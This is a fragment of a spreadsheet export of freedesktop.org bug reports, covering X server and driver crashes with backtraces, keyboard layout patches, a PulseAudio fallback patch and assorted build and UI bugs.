[   495.465] (WW) The directory /usr/share/fonts/X11/100dpi does not exist.
[   495.465] 	Entry deleted from font path.
[   495.465] (WW) The directory /usr/share/fonts/X11/75dpi does not exist.
[   495.465] 	Entry deleted from font path.
[   495.465] (==) FontPath set to:
	/usr/share/fonts/X11/misc
	built-ins
[   495.466] (==) ModulePath set to /usr/lib/i386-linux-gnu/xorg/extra-modules/usr/lib/xorg/extra-modules/usr/lib/xorg/modules
[   495.466] (II) The server relies on udev to provide the list of input devices.
	If no devices become available reconfigure udev or disable AutoAddDevices.
[   495.466] (II) Loader magic: 0x8029c6c0
[   495.466] (II) Module ABI versions:
[   495.466] 	X.Org ANSI C Emulation: 0.4
[   495.466] 	X.Org Video Driver: 19.0
[   495.466] 	X.Org XInput driver : 21.0
[   495.466] 	X.Org Server Extension : 9.0
[   495.468] (--) PCI:*(0:1:0:0) 1106:3371:1019:2125 rev 1 Mem @ 0xd0000000/268435456 0xfd000000/16777216 BIOS @ 0x????????/65536
[   495.468] (II) LoadModule: glx
[   495.469] (II) Loading /usr/lib/xorg/modules/extensions/libglx.so
[   495.472] (II) Module glx: vendor=X.Org Foundation
[   495.472] 	compiled for 1.17.2 module version = 1.0.0
[   495.472] 	ABI class: X.Org Server Extension version 9.0
[   495.473] (==) AIGLX enabled
[   495.473] (==) Matched openchrome as autoconfigured driver 0
[   495.473] (==) Matched modesetting as autoconfigured driver 1
[   495.473] (==) Matched fbdev as autoconfigured driver 2
[   495.473] (==) Matched vesa as autoconfigured driver 3
[   495.473] (==) Assigned the driver to the xf86ConfigLayout
[   495.473] (II) LoadModule: openchrome
[   495.473] (II) Loading /usr/lib/xorg/modules/drivers/openchrome_drv.so
[   495.474] (II) Module openchrome: vendor=http://openchrome.org/
[   495.474] 	compiled for 1.17.1 module version = 0.3.3
[   495.474] 	Module class: X.Org Video Driver
[   495.474] 	ABI class: X.Org Video Driver version 19.0
[   495.474] (II) LoadModule: modesetting
[   495.474] (II) Loading /usr/lib/xorg/modules/drivers/modesetting_drv.so
[   495.475] (II) Module modesetting: vendor=X.Org Foundation
[   495.475] 	compiled for 1.17.2 module version = 1.17.2
[   495.475] 	Module class: X.Org Video Driver
[   495.475] 	ABI class: X.Org Video Driver version 19.0
[   495.475] (II) LoadModule: fbdev
[   495.475] (II) Loading /usr/lib/xorg/modules/drivers/fbdev_drv.so
[   495.475] (II) Module fbdev: vendor=X.Org Foundation
[   495.476] 	compiled for 1.17.1 module version = 0.4.4
[   495.476] 	Module class: X.Org Video Driver
[   495.476] 	ABI class: X.Org Video Driver version 19.0
[   495.476] (II) LoadModule: vesa
[   495.476] (II) Loading /usr/lib/xorg/modules/drivers/vesa_drv.so
[   495.477] (II) Module vesa: vendor=X.Org Foundation
[   495.477] 	compiled for 1.17.1 module version = 2.3.4
[   495.477] 	Module class: X.Org Video Driver
[   495.477] 	ABI class: X.Org Video Driver version 19.0
[   495.477] (II) OPENCHROME: Driver for VIA Chrome chipsets: CLE266 KM400/KN400
	K8M800/K8N800 PM800/PM880/CN400 VM800/P4M800Pro/VN800/CN700
	CX700/VX700 K8M890/K8N890 P4M890 P4M900/VN896/CN896 VX800/VX820
	VX855/VX875 VX900
[   495.477] (II) modesetting: Driver for Modesetting Kernel Drivers: kms
[   495.477] (II) FBDEV: driver for framebuffer: fbdev
[   495.477] (II) VESA: driver for VESA chipsets: vesa
[   495.477] (--) using VT number 2
[   495.519] (!!) VIA Technologies does not support this driver in any way.
[   495.520] (!!) For support please refer to http://www.openchrome.org/.
[   495.520] (!!) (openchrome 0.3.3 release)
[   495.520] (WW) Falling back to old probe method for modesetting
[   495.520] (EE) open /dev/dri/card0: No such file or directory
[   495.520] (WW) Falling back to old probe method for fbdev
[   495.520] (II) Loading sub module fbdevhw
[   495.520] (II) LoadModule: fbdevhw
[   495.520] (II) Loading /usr/lib/xorg/modules/libfbdevhw.so
[   495.521] (II) Module fbdevhw: vendor=X.Org Foundation
[   495.521] 	compiled for 1.17.2 module version = 0.0.2
[   495.521] 	ABI class: X.Org Video Driver version 19.0
[   495.521] (WW) Falling back to old probe method for vesa
[   495.521] (II) CHROME(0): VIAPreInit
[   495.521] (II) CHROME(0): VIAGetRec
[   495.521] (--) CHROME(0): Chipset: P4M900/VN896/CN896
[   495.521] (--) CHROME(0): Chipset revision: 0
[   495.675] (EE) CHROME(0): [drm] Failed to open DRM device for pci:0000:01:00.0: No such file or directory
[   495.676] (II) Loading sub module vgahw
[   495.676] (II) LoadModule: vgahw
[   495.677] (II) Loading /usr/lib/xorg/modules/libvgahw.so
[   495.678] (II) Module vgahw: vendor=X.Org Foundation
[   495.678] 	compiled for 1.17.2 module version = 0.1.0
[   495.678] 	ABI class: X.Org Video Driver version 19.0
[   495.678] (--) CHROME(0): Probed amount of VideoRAM = 262144 kB
[   495.678] (II) CHROME(0): VIAMapMMIO
[   495.678] (--) CHROME(0): mapping MMIO @ 0xfd000000 with size 0xd000
[   495.678] (--) CHROME(0): mapping BitBlt MMIO @ 0xfd200000 with size 0x200000
[   495.679] (II) CHROME(0): vgaHWGetIOBase: hwp-&gt;IOBase is 0x03d0
[   495.679] (II) CHROME(0): VIAMapFB
[   495.679] (--) CHROME(0): mapping framebuffer @ 0xd0000000 with size 0x10000000
[   495.685] (--) CHROME(0): Frame buffer start: 0xa6b96000 free start: 0x0 end: 0x10000000
[   495.685] (II) CHROME(0): Creating default Display subsection in Screen section
	Default Screen Section for depth/fbbpp 24/32
[   495.685] (==) CHROME(0): Depth 24 (--) framebuffer bpp 32
[   495.685] (==) CHROME(0): RGB weight 888
[   495.685] (==) CHROME(0): Default visual is TrueColor
[   495.685] (II) CHROME(0): VIASetupDefaultOptions - Setting up default chipset options.
[   495.685] (==) CHROME(0): Shadow framebuffer is disabled.
[   495.685] (==) CHROME(0): Hardware acceleration is enabled.
[   495.685] (==) CHROME(0): Using EXA acceleration architecture.
[   495.685] (==) CHROME(0): EXA composite acceleration enabled.
[   495.686] (==) CHROME(0): EXA scratch area size is 4096 kB.
[   495.686] (==) CHROME(0): Using hardware two-color cursors and software full-color cursors.
[   495.686] (==) CHROME(0): GPU virtual command queue will be enabled.
[   495.686] (==) CHROME(0): DRI IRQ will be enabled if DRI is enabled.
[   495.686] (==) CHROME(0): AGP DMA will be disabled if DRI is enabled.
[   495.686] (==) CHROME(0): PCI DMA will not be used for XV image transfer if DRI is enabled.
[   495.686] (==) CHROME(0): Will not enable VBE modes.
[   495.686] (==) CHROME(0): VBE VGA register save &amp; restore will not be used
	if VBE modes are enabled.
[   495.686] (==) CHROME(0): Xv Bandwidth check is enabled.
[   495.686] (==) CHROME(0): Will not impose a limit on video RAM reserved for DRI.
[   495.686] (==) CHROME(0): Will try to allocate 32768 kB of AGP memory.
[   495.686] (==) CHROME(0): TV dotCrawl is disabled.
[   495.686] (==) CHROME(0): TV deflicker is set to 0.
[   495.686] (==) CHROME(0): No default TV type is set.
[   495.686] (==) CHROME(0): No default TV output signal type is set.
[   495.686] (==) CHROME(0): No default TV output port is set.
[   495.686] (==) CHROME(0): Will not print VGA registers.
[   495.687] (==) CHROME(0): Will not scan I2C buses.
[   495.687] (II) CHROME(0): ...Finished parsing config file options.
[   495.687] (EE) CHROME(0): Unknown Card-Ids (3371|1019|2125) Chipset: P4M900/VN896/CN896 please report to openchrome-users@lists.freedesktop.org
[   495.687] (EE) 
[   495.688] (EE) Backtrace:
[   495.690] (EE) 0: /usr/bin/X (xorg_backtrace+0x52) [0x801d80e2]
[   495.691] (EE) 1: /usr/bin/X (0x80035000+0x1a7522) [0x801dc522]
[   495.692] (EE) 2: (vdso) (__kernel_rt_sigreturn+0x0) [0xb779fbd0]
[   495.693] (EE) 3: /usr/lib/xorg/modules/drivers/openchrome_drv.so (0xb6dc1000+0x125bc) [0xb6dd35bc]
[   495.694] (EE) 4: /usr/bin/X (InitOutput+0xb89) [0x800b82e9]
[   495.696] (EE) 5: /usr/bin/X (0x80035000+0x4207f) [0x8007707f]
[   495.697] (EE) 6: /usr/bin/X (0x80035000+0x2bd9a) [0x80060d9a]
[   495.698] (EE) 7: /lib/i386-linux-gnu/libc.so.6 (__libc_start_main+0xde) [0xb735c72e]
[   495.699] (EE) 8: /usr/bin/X (0x80035000+0x2bdd8) [0x80060dd8]
[   495.700] (EE) 
[   495.701] (EE) Segmentation fault at address 0x0
[   495.701] (EE) 
Fatal server error:
[   495.702] (EE) Caught signal 11 (Segmentation fault). Server aborting
[   495.702] (EE) 
[   495.703] (EE) 
Please consult the The X.Org Foundation support 
	 at http://wiki.x.org
 for help. 
[   495.704] (EE) Please also check the log file at /var/log/Xorg.0.log for additional information.
[   495.704] (EE) 
[   495.787] (EE) Server terminated with error (1). Closing log file.</t>
  </si>
  <si>
    <t>noloader</t>
  </si>
  <si>
    <t>UIM-6836</t>
  </si>
  <si>
    <t>Confirmation dialog works unexpectedly on a quit</t>
  </si>
  <si>
    <t>The confirmation dialog works unexpectedly on the sequence below.
1) Run uim-pref-gtk
2) Modify a value
3) Press close button of the application window (not cancel button)
4) Press No of the confirmation dialog
5) uim-pref quits even if answered No</t>
  </si>
  <si>
    <t>XORG-25343</t>
  </si>
  <si>
    <t>Some fonts corrupted and X crashes (occasionally).</t>
  </si>
  <si>
    <t>I just upgraded xserver &amp; pixman to today's git master (I did this last a few days ago).  Something is really broken--fonts on menu's in some apps (e.g. qt-based firefox gnome-terminal) are garbled but not in others (xterm).  
I've also had a crash on startup (not 100% reproducable).  The log shows the following backtrace:
Backtrace:
0: /usr/bin/X (xorg_backtrace+0x39) [0x80b4af5]
1: /usr/bin/X (0x8048000+0x5e6d0) [0x80a66d0]
2: (vdso) (__kernel_rt_sigreturn+0x0) [0xffffe40c]
3: /usr/lib/libpixman-1.so.0 (0xb74de000+0x563d) [0xb74e363d]
4: /usr/lib/libpixman-1.so.0 (0xb74de000+0x4db15) [0xb752bb15]
5: /usr/lib/libpixman-1.so.0 (0xb74de000+0x4dce3) [0xb752bce3]
6: /usr/lib/libpixman-1.so.0 (0xb74de000+0x18ca9) [0xb74f6ca9]
7: /usr/lib/libpixman-1.so.0 (0xb74de000+0x4286f) [0xb752086f]
8: /usr/lib/libpixman-1.so.0 (0xb74de000+0x4ef18) [0xb752cf18]
9: /usr/lib/libpixman-1.so.0 (0xb74de000+0x4f077) [0xb752d077]
10: /usr/lib/libpixman-1.so.0 (0xb74de000+0x42a5b) [0xb7520a5b]
11: /usr/lib/libpixman-1.so.0 (0xb74de000+0x19972) [0xb74f7972]
12: /usr/lib/libpixman-1.so.0 (0xb74de000+0x47513) [0xb7525513]
13: /usr/lib/libpixman-1.so.0 (0xb74de000+0x19972) [0xb74f7972]
14: /usr/lib/libpixman-1.so.0 (0xb74de000+0xb8fcf) [0xb7596fcf]
15: /usr/lib/libpixman-1.so.0 (0xb74de000+0x19972) [0xb74f7972]
16: /usr/lib/libpixman-1.so.0 (0xb74de000+0x102098) [0xb75e0098]
17: /usr/lib/libpixman-1.so.0 (0xb74de000+0x19972) [0xb74f7972]
18: /usr/lib/libpixman-1.so.0 (pixman_image_composite+0x21f) [0xb7520efe]
19: /usr/lib/xorg/modules/libfb.so (fbComposite+0x1c0) [0xb6f2604e]
20: /usr/lib/xorg/modules/libexa.so (0xb6ef5000+0x12ba7) [0xb6f07ba7]
21: /usr/lib/xorg/modules/libexa.so (0xb6ef5000+0x1084b) [0xb6f0584b]
22: /usr/bin/X (0x8048000+0xd8cc2) [0x8120cc2]
23: /usr/bin/X (CompositePicture+0x18b) [0x81102ac]
24: /usr/bin/X (0x8048000+0xccea0) [0x8114ea0]
25: /usr/bin/X (0x8048000+0xcf2c6) [0x81172c6]
26: /usr/bin/X (0x8048000+0x47b87) [0x808fb87]
27: /usr/bin/X (0x8048000+0x1b673) [0x8063673]
28: /lib/libc.so.6 (__libc_start_main+0xe0) [0xb732b390]
29: /usr/bin/X (0x8048000+0x1b0d1) [0x80630d1]
Segmentation fault at address 0xa54ae774
Fatal server error:
Caught signal 11 (Segmentation fault). Server aborting
I've got alot of xorg built with debugging symbols so I should be able to get a better backtrace but for some reason I can't seem to get X to drop a core file.
Finally I'm not sure that this is a xserver issue (it could be pixman).  
I'm running on an i686 using an up to date gnome and the ati driver (also updated to the git master).</t>
  </si>
  <si>
    <t>DRI-78764</t>
  </si>
  <si>
    <t>[ILK/IVB/HSW Bisected]igt/gem_reg_read fails</t>
  </si>
  <si>
    <t xml:space="preserve">Created attachment 99132
dmesg
==System Environment==
--------------------------
Regression: Yes. 
It was igt issue
Non-working platforms: ILK IVB HSW
==kernel==
--------------------------
-nightly: c74cad3c2599b47438b168ca5629fbb00ab63f95 (fails)
-queued: 229b0489aa75a8c51d2f2e124329d3ac326f326d (fails)
    Author: Mika Kuoppala 
    Date:   Wed May 14 17:02:17 2014 +0300
    drm/i915: add null render states for gen6 gen7 and gen8
    These are generated with intel-gpu-tools/tools/null_state_gen
    v2: Don't use header file for states (Daniel Vetter)
    v3: Proper URB state size for gen8/GT3 (Damien Lespiau)
    Tested-by: Kristen Carlson Accardi  (v1)
    Tested-by: Oscar Mateo  (v2)
    Acked-by: Damien Lespiau 
    Signed-off-by: Mika Kuoppala 
    Signed-off-by: Daniel Vetter 
-fixes: 05adaf1f101f25f40f12c29403e6488f0e45f6b6 (fails)
    Author: Jani Nikula 
    Date:   Fri May 9 14:52:34 2014 +0300
    drm/i915/vlv: reset VLV media force wake request register
    Media force wake get hangs the machine when the system is booted without
    displays attached. The assumption is that (at least some versions of)
    the firmware has skipped some initialization in that case.
    Empirical evidence suggests we need to reset the media force wake
    request register in addition to the render one to avoid hangs.
    Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=75895
    Reported-by: Imre Deak 
    Reported-by: Darren Hart 
    Tested-by: Darren Hart 
    Reviewed-by: Mika Kuoppala 
    Cc: stable@vger.kernel.org
    Signed-off-by: Jani Nikula 
==Bug detailed description==
-----------------------------
igt(5e83f0444d0fcef2d5996ef12f9cf1593ccd8f78)
igt/gem_reg_read fails
Output:
./gem_reg_read
IGT-Version: 1.6-g62cd793 (x86_64) (Linux: 3.15.0-rc3_drm-intel-nightly_c74cad_20140515+ x86_64)
Test assertion failure function __real_main55 file gem_reg_read.c:76:
Last errno: 22 Invalid argument
Failed assertion: ret != 0 &amp;&amp; errno == ENOENT
==Reproduce steps==
---------------------------- 
1. ./gem_reg_read
==Bisect results==
----------------------------
Bisect shows: 0b7ce4ac2929ea56dfde508d551163a5304c66d8 is the first bad commit
commit 0b7ce4ac2929ea56dfde508d551163a5304c66d8
Author:     Daniel Vetter 
AuthorDate: Wed May 14 09:56:53 2014 +0200
Commit:     Daniel Vetter 
CommitDate: Wed May 14 09:56:53 2014 +0200
    tests: Use igt macros more
    Often just folding together of the common if (cond) printf
    abort|igt_skip|igt_fail pattern. But in a few cases I've ripped out
    more since the igt macros will already print the condition and errno.
    A few tests where more work (like ripping out return codes en masse)
    is needed left as-is.
    Signed-off-by: Daniel Vetter </t>
  </si>
  <si>
    <t>XORG-1078</t>
  </si>
  <si>
    <t>-configure sets keyboard as drivers instead of kbd</t>
  </si>
  <si>
    <t>I noticed that Xorg -configure creates a configuration file with keyboard as
keyboard driver instead of the new kbd. I think that the attached patch fixes
it. (not tested but it's a one-liner)</t>
  </si>
  <si>
    <t>diegocg</t>
  </si>
  <si>
    <t>LIBREOFFICE-50429</t>
  </si>
  <si>
    <t>SLIDESHOW: Shape combined with picture is not displayed correctly</t>
  </si>
  <si>
    <t>Created attachment 62171
Presentation (one slide) that illustrates the problem.
Problem description: 
When a circle or other curved shape is combined with a picture (resulting in a picture with a transparent hole in it) the Slide show displays a larger polygon instead of the actual shape. 
Steps to reproduce:
1. In a new presentation insert a picture from a file.  (Enlarge it if desired to fill the slide.)
2. From the Basic Shapes toolbar select the Circle tool.  Draw a circle on the slide on top of the inserted picture.
3. Select both the circle and the picture.  From the right-mouse menu choose Combine.  The result is a transparent circular hole in the picture.
4. Start the slide show.  Instead of a circle the transparent hole is a larger octagon.
(The same problem affects other shapes as well including ellipse ring and cylinder.)
Current behavior:
Slide show displays the transparent hole as a larger polygon.
Expected behavior:
Slide show should display the shape correctly as normal slide view does.
Platform (if different from the browser): 
MS Windows 7 Pro v6.1.7601 SP1 on Dell Inspiron 620 (Core i5-2320).  Built-in Intel HD graphics.
Browser: Chrome/19.0.1084.46</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-3952</t>
  </si>
  <si>
    <t>SUN Type6 USB keyboard support on x86</t>
  </si>
  <si>
    <t>This patch adds support for SUN Type6 USB keyboards on x86 (at least it was just
tested there). Layouts supported are currently de us fr_CH and their
nodeadkeys variants. The keyboard section looks like this now:
Section InputDevice
    Identifier Keyboard0
    Driver    kbd
    Option     XKbModel   sun6
#    Option     XKbLayout  fr_CH
    Option     XKbLayout  de
#    Option     XKbLayout  us
    Option     XkbVariant  nodeadkeys
EndSection
P.S.: will be available for feedback at end of 08/2005.</t>
  </si>
  <si>
    <t>hah</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-84683</t>
  </si>
  <si>
    <t>Please remove me as list owner for hal and hal-commit</t>
  </si>
  <si>
    <t>Hi
Please remove me - zeuthen@gmail.com - as list administrator from the two mailing lists
 http://lists.freedesktop.org/mailman/listinfo/hal
 http://lists.freedesktop.org/mailman/listinfo/hal-commit
I'd do it myself but I have forgotten the administrator password. Thanks!</t>
  </si>
  <si>
    <t>LIBREOFFICE-41298</t>
  </si>
  <si>
    <t>BUGZILLAASSISTANT: Attachment submission functions out of focus</t>
  </si>
  <si>
    <t>After Bug Submission the Attachment Submission page appears but in Seamonkey 2.3.3 the functional part of the page (at the top of the page) is out of focus it looks as if you reached an empty page.
Steps to reproduce:
1. Submit a bug
   Expected: for step 8 Browse button and other functions visible
   Actual: focus on bottom of the page (more or less all white)</t>
  </si>
  <si>
    <t>PULSEAUDIO-93285</t>
  </si>
  <si>
    <t>clients</t>
  </si>
  <si>
    <t>no fallback when SRB channel fails</t>
  </si>
  <si>
    <t>If a client fails to initialise the SRB channel then it will throw a protocol error and refuse to continue. This is very undesirable as the SRB channel requires some glibc and kernel features that the client might not have support for. The protocol doesn't clearly specify how the client can opt out of SRB support except possibly limiting itself to version 29 of the protocol. But that's not really a long term solution.
Looking at the code it seems like the server can deal just fine with the client never ack:ing the PA_COMMAND_ENABLE_SRBCHANNEL. So that's what I've done in our end for now:
diff --git a/src/pulse/context.c b/src/pulse/context.c
index 738ea84..9566c04 100644
--- a/src/pulse/context.c
+++ b/src/pulse/context.c
@@ -3647 +36411 @@ static void handle_srbchannel_memblock(pa_context *c pa_memblock *memblock) {
     pa_memblock_ref(memblock)
     sr = pa_srbchannel_new_from_template(c-&gt;mainloop 
     if (!sr) {
-        pa_context_fail(c PA_ERR_PROTOCOL)
+        pa_log_warn(Failed to enable SRB channel)
+        c-&gt;srb_template.readfd = -1
+        c-&gt;srb_template.writefd = -1
+        pa_memblock_unref(c-&gt;srb_template.memblock)
+        c-&gt;srb_template.memblock = NULL
         return
     }
Not sure if this is the correct long term approach. A nack in the protocol would have been nice though.
As to why this happens we are compiling and shipping our own PulseAudio that will talk to the local PulseAudio (via tunnel-*-new). But we have to be compatible with all kinds of old crap out there so we cannot compile against a glibc new enough to have eventfd. Hence HAVE_SYS_EVENTFD_H is not set and it will always fail to create a SRB channel.</t>
  </si>
  <si>
    <t>CAIRO-30294</t>
  </si>
  <si>
    <t>win32+vc build broken for 1.10.0</t>
  </si>
  <si>
    <t>1) src/Makefile.sources contain some thing like that:
    if CAIRO_HAS_PDF_SURFACE
        req_cairo_deflate_stream_sources = $(cairo_deflate_stream_sources)
    endif
    this should be changed to:
    ifeq ($(CAIRO_HAS_PDF_SURFACE)1)
        req_cairo_deflate_stream_sources = $(cairo_deflate_stream_sources)
    endif
    otherwise the make shipped in MSYS can't recognize the syntax.
2) in src/cairoint.h _cairo_lround is defined to lround which is only availble in GCCï¼Œvisual c++ can't find lround.</t>
  </si>
  <si>
    <t>jianliang79</t>
  </si>
  <si>
    <t>XORG-666</t>
  </si>
  <si>
    <t>New XKB option for Tux keys: request for addition</t>
  </si>
  <si>
    <t>Submitted by Daniel Elstner:
---
Basically the bottom row of my keyboard (which is just a standard pc105
model with three replaced caps) now looks like this:
In order to make the keyboard work as advertised on the key caps I need
to map the keys as follows:
     = Super_L
     = Alt_R Meta_R
     = Super_R
So I did just that by putting another option into symbols/altwin:
// Layout for Tux key caps with additional right Alt key
partial modifier_keys 
xkb_symbols alt_super_win {
    key  {        [       Alt_L  Meta_L          ]       }
    key  {        [       Alt_R  Meta_R          ]       }
    key  {        [       Super_L                 ]       }
    key  {        [       Super_R                 ]       }
    modifier_map Mod1   { Alt_L Alt_R Meta_L Meta_R }
    modifier_map Mod4   { Super_L Super_R }
}
Obviously I also need put this line into rules/xfree86:
altwin:alt_super_win    =       +altwin(alt_super_win)
And finally there's the description entry in rules/xfree86.xml.  The
description was a little hard to keep short since this option actually
sets up two modifier mappings.  However I'm not sure if splitting it
into separate options would actually be useful.  (This would require
adding another option group too since in this one multiple selections
are disallowed.)  Anyway here's the text:
  altwin:alt_super_win
  Alt is mapped to the right Win-key and Super to Menu.
If you look at the patch you'll see that I also changed two other option
entries in the XML file.  Those referred to option names which did not
exist looks very much just like a copy-n-paste mistake.</t>
  </si>
  <si>
    <t>DRI-94870</t>
  </si>
  <si>
    <t>[BAT ILK] list_add corruption in test drv_module_reload_basic</t>
  </si>
  <si>
    <t>During BAT testing of a patch targeting gen9 only igt test drv_module_reload_basic causes list_add corruption warning in dmesg log on the ilk-hp8440p target although the test reports success.
Patch being tested is https://patchwork.freedesktop.org/series/5367/
This introduces a workaround in gen9_init_workarounds which is also
conditional on
 (IS_SKL_REVID(dev SKL_REVID_C0 REVID_FOREVER) || IS_BROXTON(dev))
So this patch should not be able to affect an ILK target.
Regression build. CI_DRM_1201
Dmesg:
[  200.736652] Setting dangerous option inject_load_failure - tainting kernel
[  201.274660] Setting dangerous option inject_load_failure - tainting kernel
[  201.827477] Setting dangerous option inject_load_failure - tainting kernel
[  202.341648] Setting dangerous option inject_load_failure - tainting kernel
[  205.869759] ------------[ cut here ]------------
[  205.869769] WARNING: CPU: 1 PID: 5982 at lib/list_debug.c:29 __list_add+0x65/0xc0
[  205.869771] list_add corruption. next-&gt;prev should be prev (ffff8800b6832ce8) but was           (null). (next=ffff8801207480f8).
[  205.869773] Modules linked in: snd_hda_intel(+) i915 ax88179_178a usbnet mii intel_powerclamp coretemp snd_hda_codec_hdmi crct10dif_pclmul crc32_pclmul snd_hda_codec_generic ghash_clmulni_intel snd_hda_codec snd_hwdep lpc_ich snd_hda_core snd_pcm mei_me mei sdhci_pci sdhci mmc_core e1000e ptp pps_core [last unloaded: i915]
[  205.869795] CPU: 1 PID: 5982 Comm: modprobe Tainted: G     U          4.6.0-rc2-gfxbench+ #1
[  205.869797] Hardware name: Hewlett-Packard HP EliteBook 8440p/172A BIOS 68CCU Ver. F.24 09/13/2013
[  205.869798]  0000000000000000 ffff8800b497faa8 ffffffff81404e65 ffff8800b497faf8
[  205.869801]  0000000000000000 ffff8800b497fae8 ffffffff81079c7c 0000001d00000286
[  205.869804]  ffff88007ee8bb78 ffff8801207480f8 ffff8800b6832ce8 ffffffff81c52150
[  205.869807] Call Trace:
[  205.869811]  [] dump_stack+0x67/0x92
[  205.869816]  [] __warn+0xcc/0xf0
[  205.869818]  [] warn_slowpath_fmt+0x4a/0x50
[  205.869820]  [] __list_add+0x65/0xc0
[  205.869824]  [] d_alloc+0x56/0x70
[  205.869827]  [] __lookup_hash+0x2e/0x50
[  205.869830]  [] lookup_one_len+0xcd/0x120
[  205.869833]  [] start_creating+0x69/0xf0
[  205.869835]  [] __create_dir+0x11/0xf0
[  205.869837]  [] tracefs_create_dir+0x10/0x20
[  205.869840]  [] event_create_dir+0x2ae/0x4d0
[  205.869842]  [] __trace_add_new_event+0x21/0x30
[  205.869844]  [] trace_module_notify+0x154/0x1a0
[  205.869848]  [] notifier_call_chain+0x39/0xa0
[  205.869851]  [] __blocking_notifier_call_chain+0x48/0x70
[  205.869853]  [] blocking_notifier_call_chain+0x11/0x20
[  205.869857]  [] load_module+0x1a81/0x24b0
[  205.869860]  [] ? kernel_read+0x3c/0x50
[  205.869862]  [] SyS_finit_module+0xa9/0xd0
[  205.869867]  [] entry_SYSCALL_64_fastpath+0x1c/0xac
[  205.869869] ---[ end trace 0dbd577555177c51 ]---</t>
  </si>
  <si>
    <t>tim.gore</t>
  </si>
  <si>
    <t>XORG-87552</t>
  </si>
  <si>
    <t>[NV1A] 3.18.1 BUG on modprobe nouveau in drivers/gpu/drm/nouveau/core/core/event.c:42</t>
  </si>
  <si>
    <t>[  289.984831] nouveau  [  DEVICE][0000:02:00.0] BOOT0  : 0x01a000b1
[  289.991043] nouveau  [  DEVICE][0000:02:00.0] Chipset: nForce (NV1A)
[  289.997439] nouveau  [  DEVICE][0000:02:00.0] Family : NV10
[  290.003256] nouveau  [   VBIOS][0000:02:00.0] checking PRAMIN for image...
[  290.045349] nouveau  [   VBIOS][0000:02:00.0] ... checksum invalid
[  290.051619] nouveau  [   VBIOS][0000:02:00.0] checking PROM for image...
[  290.058391] nouveau  [   VBIOS][0000:02:00.0] ... signature not found
[  290.064895] nouveau  [   VBIOS][0000:02:00.0] checking ACPI for image...
[  290.071710] nouveau  [   VBIOS][0000:02:00.0] ... signature not found
[  290.078205] nouveau  [   VBIOS][0000:02:00.0] checking PCIROM for image...
[  290.085961] nouveau  [   VBIOS][0000:02:00.0] ... appears to be valid
[  290.092511] nouveau  [   VBIOS][0000:02:00.0] using image from PCIROM
[  290.099003] nouveau  [   VBIOS][0000:02:00.0] BMP version 5.14
[  290.105141] nouveau  [   VBIOS][0000:02:00.0] version 03.1a.01.03.00
[  290.111606] nouveau W[   VBIOS][0000:02:00.0] DCB contains no useful data
[  290.120249] nouveau W[   VBIOS][0000:02:00.0] DCB contains no useful data
[  290.128356] nouveau W[   VBIOS][0000:02:00.0] DCB contains no useful data
[  290.135257] nouveau W[   VBIOS][0000:02:00.0] DCB contains no useful data
[  290.142279] nouveau W[  PTIMER][0000:02:00.0] unknown input clock freq
[  290.148881] nouveau  [     PFB][0000:02:00.0] RAM type: stolen system memory
[  290.155987] nouveau  [     PFB][0000:02:00.0] RAM size: 32 MiB
[  290.161882] nouveau  [     PFB][0000:02:00.0]    ZCOMP: 0 tags
[  290.173304] nouveau  [     CLK][0000:02:00.0] --:   
[  290.178387] ------------[ cut here ]------------
[  290.180008] kernel BUG at /usr/src/linux-git/drivers/gpu/drm/nouveau/core/core/event.c:42!
[  290.180008] invalid opcode: 0000 [#1] 
[  290.180008] Modules linked in: nouveau(+) wmi ttm drm_kms_helper nfsv3 nfs_acl nfs lockd grace sunrpc
[  290.180008] CPU: 0 PID: 41 Comm: kworker/0:2 Not tainted 3.18.1-jupiter #1
[  290.180008] Hardware name: NVIDIA Corporation. nFORCE-MCP/MS-6373 BIOS 6.00 PG 04/12/2002
[  290.180008] Workqueue: events nouveau_pstate_work [nouveau]
[  290.180008] task: dd71c000 ti: dd720000 task.ti: dd720000
[  290.180008] EIP: 0060:[] EFLAGS: 00010046 CPU: 0
[  290.180008] EIP is at nvkm_event_get+0x3/0x10 [nouveau]
[  290.180008] EAX: dc31eab4 EBX: 00000286 ECX: 00000000 EDX: 00000001
[  290.180008] ESI: 00000000 EDI: ffffffff EBP: dd721ea8 ESP: dd721ea8
[  290.180008]  DS: 007b ES: 007b FS: 0000 GS: 00e0 SS: 0068
[  290.180008] CR0: 8005003b CR2: b7742000 CR3: 1cf95000 CR4: 000007d0
[  290.180008] Stack:
[  290.180008]  dd721eb4 dea1ce02 dce7cb28 dd721f04 dea2f386 00000000 00000005 deaea246
[  290.180008]  ffffffff 00000001 ffffffff ffffffff ffffffff 00000000 00000000 dd71c000
[  290.180008]  dce07670 ffffffff 00000000 dce7ca50 dce7cb28 00000000 dd6f8e70 dd721f44
[  290.180008] Call Trace:
[  290.180008]  [] nvkm_notify_get+0x32/0x40 [nouveau]
[  290.180008]  [] nouveau_pstate_work+0x396/0x3a0 [nouveau]
[  290.180008]  [] process_one_work+0x1d7/0x360
[  290.180008]  [] worker_thread+0x2af/0x380
[  290.180008]  [] ? rescuer_thread+0x1d0/0x1d0
[  290.180008]  [] ? rescuer_thread+0x1d0/0x1d0
[  290.180008]  [] kthread+0xa4/0xb0
[  290.180008]  [] ret_from_kernel_thread+0x20/0x30
[  290.180008]  [] ? flush_kthread_worker+0x70/0x70
[  290.180008] Code: cf a9 e2 90 8d 74 26 00 83 c4 0c 5b 5e 5f 5d c3 66 90 66 90 66 90 66 90 55 89 e5 0f 0b 8d 74 
[  290.180008] EIP: [] nvkm_event_get+0x3/0x10 [nouveau] SS:ESP 0068:dd721ea8
[  290.180008] ---[ end trace da282f24d1451e27 ]---</t>
  </si>
  <si>
    <t>DRI-30371</t>
  </si>
  <si>
    <t>[SNB drm-intel-next] blank VGA</t>
  </si>
  <si>
    <t>Environment:
------------
platform: HuronRiver
kernel:         (drm-intel-next)38d922ba211c1efdbe00809c899f1ca4979c84c7
Libdrm:         (master)2.4.21-21-g7ec9a1effa4f551897f91f3b017723a8adf011d9
Mesa:           (7.9)83f5f50f2f69adae497c71ac48e4e0177979ebff
Xserver:                (master)xorg-server-1.9.0
Xf86_video_intel:               (master)2.12.0-87-g08c2caca48323d6d5701dcef3486f850619d7905
Cairo:          (master)cb0bc64c16b3a38cbf0c622830c18ac9ea6e2ffe
Libva:          (master)6772bdb4406edaf55da2e3604003c9eafff31c36
Bug detailed description:
--------------------------
Screen turns to black while kernel boots up using the latest version. But we are able to login the machine with ssh.
